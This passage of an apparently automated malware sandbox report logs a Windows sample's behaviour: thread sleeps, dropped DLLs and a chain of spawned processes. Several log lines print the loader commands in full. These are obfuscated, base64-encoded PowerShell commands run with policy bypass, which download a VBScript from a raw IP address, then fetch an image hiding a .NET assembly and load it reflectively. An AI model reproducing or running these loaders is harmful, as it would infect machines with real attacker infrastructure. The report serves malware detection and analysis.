        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7515Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2342Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2647Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7200Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 940
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2409
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1557
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6621
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.dllJump to dropped file
        Source: C:\Windows\System32\mshta.exe TID: 3612Thread sleep time: -360000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3756Thread sleep count: 7515 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3756Thread sleep count: 2342 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3904Thread sleep time: -360000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3908Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2968Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1908Thread sleep time: -5534023222112862s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1908Thread sleep time: -1200000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1908Thread sleep time: -600000s >= -30000sJump to behavior
        Source: C:\Windows\System32\mshta.exe TID: 1884Thread sleep time: -540000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3604Thread sleep count: 940 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3604Thread sleep count: 2409 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1316Thread sleep time: -180000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2920Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3644Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3960Thread sleep count: 1557 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3952Thread sleep count: 6621 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3700Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 652Thread sleep time: -15679732462653109s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 652Thread sleep time: -1200000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 652Thread sleep time: -600000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell download and execute
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4092, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3832, type: MEMORYSTR
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES476D.tmp" "c:\Users\user\AppData\Local\Temp\izhw321o\CSCDC8260CFBF8C4877B302B76AFCC254F.TMP"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovalsJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA5F0.tmp" "c:\Users\user\AppData\Local\Temp\24vqjdjh\CSCC170874EB5994B058785371DF20B8BA.TMP"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgngt0hoanfqbcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagiefkzc1uexblicagicagicagicagicagicagicagicagicagicagicagic1tzu1czvjkzuzjtmluau9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxnt24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbszwfguuh5zyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvhh0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbstu0sdwludcagicagicagicagicagicagicagicagicagicagicagicbltw52behrb3assw50uhryicagicagicagicagicagicagicagicagicagicagicagigtmymv1bvipoycgicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicagimdodyigicagicagicagicagicagicagicagicagicagicagicaglu5hbwvzcefdrsagicagicagicagicagicagicagicagicagicagicagicbmvxrkqlygicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaky0zpse5qcvbsojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xndiunjavndy2l2tpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlc3rmb3jtzs50suyilcikru52okfquerbvefca2lkc25py2vmb3jtzxrvz2v0ymfja2dyzwf0dghpbmdzd2l0ag5ldgllcnrpbwvnaxzlbm1lymvzlnziuyismcwwktttdefsdc1ztgvfccgzkttjblzvs0utrxhqukvtc2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvovjpbufbeqvrbxgtpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlcy52ylmi'+[char]0x22+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; 